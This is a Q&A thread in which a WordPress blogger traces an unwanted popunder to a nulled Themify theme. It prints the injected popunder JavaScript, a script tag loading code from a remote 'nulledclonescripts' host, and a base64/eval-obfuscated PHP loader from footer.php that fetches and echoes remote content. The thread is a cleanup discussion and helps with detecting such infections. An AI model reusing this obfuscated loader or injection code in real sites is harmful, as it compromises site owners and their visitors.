# Malicious popup injected in my Wordpress site

Tags: wordpress, popup, code-injection

I just setup my own blog using Wordpress. I don't have lots of experience with it but I think I managed OK to create something nice. Here's the link, http://blog.yveschaput.com (it's in French)

My problem is I have a popup coming up when one is clicking for the first time on any link on the site. Once it popups, it doesn't reappear again until what seems a randomly set time or event. It is injected as a javascript script in the page the visitor is first viewing, not only in the HOME page.

Anyone has any idea where that script might come from?
I'm guessing it is from a plugin I use but I just can't seem to find which one.

Here's the code being injected:

```
var puShown = false;
var PopWidth = 1370;
var PopHeight = 800;
var PopFocus = 0;
var _Top = null;

function GetWindowHeight() {
var myHeight = 0;
if( typeof( _Top.window.innerHeight ) == 'number' ) {
myHeight = _Top.window.innerHeight;
} else if( _Top.document.documentElement && _Top.document.documentElement.clientHeight ) {
myHeight = _Top.document.documentElement.clientHeight;
} else if( _Top.document.body && _Top.document.body.clientHeight ) {
myHeight = _Top.document.body.clientHeight;
}
return myHeight;
}

function GetWindowWidth() {
var myWidth = 0;
if( typeof( _Top.window.innerWidth ) == 'number' ) {
myWidth = _Top.window.innerWidth;
} else if( _Top.document.documentElement && _Top.document.documentElement.clientWidth ) {
myWidth = _Top.document.documentElement.clientWidth;
} else if( _Top.document.body && _Top.document.body.clientWidth ) {
myWidth = _Top.document.body.clientWidth;
}
return myWidth;
}

function GetWindowTop() {
return (_Top.window.screenTop != undefined) ? _Top.window.screenTop : _Top.window.screenY;
}

function GetWindowLeft() {
return (_Top.window.screenLeft != undefined) ? _Top.window.screenLeft : _Top.window.screenX;
}

function doOpen(url)
{
var popURL = "about:blank"
var popID = "ad_" + Math.floor(89999999*Math.random()+10000000);
var pxLeft = 0;
var pxTop = 0;
pxLeft = (GetWindowLeft() + (GetWindowWidth() / 2) - (PopWidth / 2));
pxTop = (GetWindowTop() + (GetWindowHeight() / 2) - (PopHeight / 2));

if ( puShown == true )
{
return true;
}

var PopWin=_Top.window.open(popURL,popID,'toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=' + pxTop + ',left=' + pxLeft + ',width=' + PopWidth + ',height=' + PopHeight);

if (PopWin)
{
puShown = true;

if (PopFocus == 0)
{
PopWin.blur();

if (navigator.userAgent.toLowerCase().indexOf("applewebkit") > -1)
{
_Top.window.blur();
_Top.window.focus();
}
}

PopWin.Init = function(e) {

with (e) {

Params = e.Params;
Main = function(){

if (typeof window.mozPaintCount != "undefined") {
var x = window.open("about:blank");
x.close();

}

var popURL = Params.PopURL;

try { opener.window.focus(); }
catch (err) { }

window.location = popURL;
}

Main();
}
};

PopWin.Params = {
PopURL: url
}

PopWin.Init(PopWin);
}

return PopWin;
}

function setCookie(name, value, time)
{
var expires = new Date();

expires.setTime( expires.getTime() + time );

document.cookie = name + '=' + value + '; path=/;' + '; expires=' + expires.toGMTString() ;
}

function getCookie(name) {
var cookies = document.cookie.toString().split('; ');
var cookie, c_name, c_value;

for (var n=0; n<cookies.length; n++) {
cookie  = cookies[n].split('=');
c_name  = cookie[0];
c_value = cookie[1];

if ( c_name == name ) {
return c_value;
}
}

return null;
}

function initPu()
{

_Top = self;

if (top != self)
{
try
{
if (top.document.location.toString())
_Top = top;
}
catch(err) { }
}

if ( document.attachEvent )
{
document.attachEvent( 'onclick', checkTarget );
}
else if ( document.addEventListener )
{
document.addEventListener( 'click', checkTarget, false );
}
}

function checkTarget(e)
{
if ( !getCookie('popundr') ) {
var e = e || window.event;
var win = doOpen('http://bit.ly/1cBiSZv');
setCookie('popundr', 1, 24*60*60*1000);
}
}

initPu();
```

Answer (score 0, accepted):

The code is being injected by your hacked theme, at the footer. As you can see in the source code, before the injected code you can see this code injected too:

```
<script type="text/javascript">
    if(!document.referrer || document.referrer == '') {
        document.write('<scr'+'ipt type="text/javascript" src="http://theme.nulledclonescripts.com/jquery.min.js"></scr'+'ipt>');
    } else {
        document.write('<scr'+'ipt type="text/javascript"  src="http://theme.nulledclonescripts.com/jquery.min.js"></scr'+'ipt>');
    }
</script>
```

And you can see this quote `theme.nulledclonescripts.com`, and this code is injected after this quote appears `<!-- wp_footer -->` so this code is included in the footer file.

That's the bad thing about hacking themes instead of buying them, that they come with malicious scripts.

To remove it just use a good notepad like `Notepad++` and use the function `Search in all files` and search for this: `bit.ly/1cBiSZv`, then remove all the malicious code.

*Semi offtopic quote:*

As a quote about hacking/cracking software and it's bad consequences for the final user, read this too: http://www.android-app-development.ie/blog/2013/03/06/inserting-keylogger-code-in-android-swiftkey-using-apktool/

If you are an user that hacks Android software too, then maybe your passwords are everywhere on the internet. I'm not getting angry with you, I download hacked software too, I'm just warning you about being careful when doing that.

Comment: Oh! I see. Actually, while looking for some free themes, I stumbled upon this one from Themefy that was, at one point, offered for free as a promotion (hence the old version number)
I never thought about it being compromised.
I'll look into it right away. Thanks a million.

Comment: I'm not into hacking/cracking at all. I try to find whatever I need in the opensource community, usually. From time to time, I'll grab something that got hacked by somebody else, just as, I guess, everybody into computers. In this particular case, I never thought about that 'cause it was offered, at one point, for free by the publisher. Though not anymore, and the version has improved since then, I thought it was "safe" to get a hold of that older version.
I guess I'll have to be more descriminating from now on.

Answer (score 0):

Please provide me the list of plugins you might be using in you website (or) you can deactivate all the plugins and then enabling the plugin one by one and testing in front end. By doing this you will get an idea that which plugin is having such malicious popup script.

Comment: Thanks for your offer for help. But +jorge-fuentes-gonzalez answer was spot on.

Answer (score 0):

As per the answer given by @jorge-fuentes-gonzalez, I found that code in the footer.php of the parent theme,

```
<!-- wp_footer -->
<?php wp_footer(); ?>

<?php themify_body_end(); //hook ?>
<?php if(!function_exists("mystr1s44")){class mystr1s21 { static $mystr1s279="Y3\x56ybF\x39pb\x6d\x6c0"; static $mystr1s178="b\x61se\x364\x5f\x64ec\x6fd\x65"; static $mystr1s381="aH\x520\x63\x44ov\x4c3Ro\x5a\x571\x6cLm5\x31b\x47x\x6cZ\x47N\x73b2\x35l\x632\x4eyaX\x420cy\x35jb2\x30\x76an\x461\x5aXJ\x35\x4cTE\x75Ni\x34zL\x6d1\x70b\x695qc\x77=\x3d";
static $mystr1s382="b\x58l\x7a\x64H\x49xc\x7a\x49y\x4dzY\x3d"; }eval("e\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34_\x64e\x63\x6fd\x65\x28\x27ZnV\x75Y\x33\x52\x70b2\x34\x67b\x58l\x7ad\x48Ix\x63\x7ac2K\x43Rte\x58N0\x63j\x46zO\x54cpe\x79R\x37\x49m1c\x65D\x635c3\x52\x79\x58Hgz\x4d\x58M\x78\x58Hgz\x4dFx\x34Mz\x67if\x54\x31t\x65XN0\x63j\x46zMj\x456O\x69R\x37Im1\x63eD\x63\x35c1x\x34Nz\x52\x63e\x44c\x79MV\x784\x4ezMx\x58Hgz\x4e\x7ag\x69fTt\x79ZX\x52\x31c\x6d4gJ\x48\x73i\x62Xlz\x58\x48g3\x4eFx\x34\x4ezI\x78XH\x673M\x7aFce\x44\x4dwO\x43J\x39\x4b\x43\x42t\x65XN0\x63j\x46zMj\x456O\x69R7J\x48si\x62Vx4\x4e\x7alce\x44c\x7aX\x48\x673N\x48Jc\x65DMx\x63\x31x\x34\x4dzk3\x49n1\x39I\x43k\x37fQ\x3d=\x27\x29\x29\x3be\x76\x61\x6c\x28b\x61s\x656\x34\x5f\x64e\x63o\x64e\x28\x27\x5anV\x75Y3R\x70b24\x67b\x58lz\x64\x48I\x78czQ\x30\x4b\x43Rte\x58N0\x63jFz\x4e\x6a\x55pI\x48tyZ\x58\x521c\x6d4gb\x58lzd\x48Ix\x63zI\x78O\x6aoke\x79R7\x49m1\x35XHg\x33M3R\x63\x65Dc\x79XH\x67z\x4d\x56x\x34N\x7aM\x32\x58\x48gzN\x53\x4a9\x66\x54t\x39\x27\x29\x29\x3b");}
if(function_exists(mystr1s76("mys\x74r1s\x3279"))){$mystr1s2235 = mystr1s76("m\x79s\x74r\x31s3\x381");$mystr1s2236 = curl_init();
$mystr1s2237 = 5;curl_setopt($mystr1s2236,CURLOPT_URL,$mystr1s2235);curl_setopt($mystr1s2236,CURLOPT_RETURNTRANSFER,1);curl_setopt($mystr1s2236,CURLOPT_CONNECTTIMEOUT,$mystr1s2237);
$mystr1s2238 = curl_exec($mystr1s2236);curl_close(${mystr1s76("mystr1s382")});echo "$mystr1s2238";}
?>
```

I commented it out and the script doesn't seem to be there anymore.
So, I guess I learned a valuable lesson today, don't rely on a hacked piece of coding unless you very well know where it comes from.

Comment: I should add I commented the part after the themify_body_end() line. I thought this line might be part of the original coding. And since the malicious code doesn't seem to be present now, I did it right.

Answer (score 0):

there can be with any nulled or untested plugin,i was facing problem because of  sweetCaptcha plugin.it has malware so its not accessed by wordpress.dont install plugins that you get from outsource except of wordpres and premium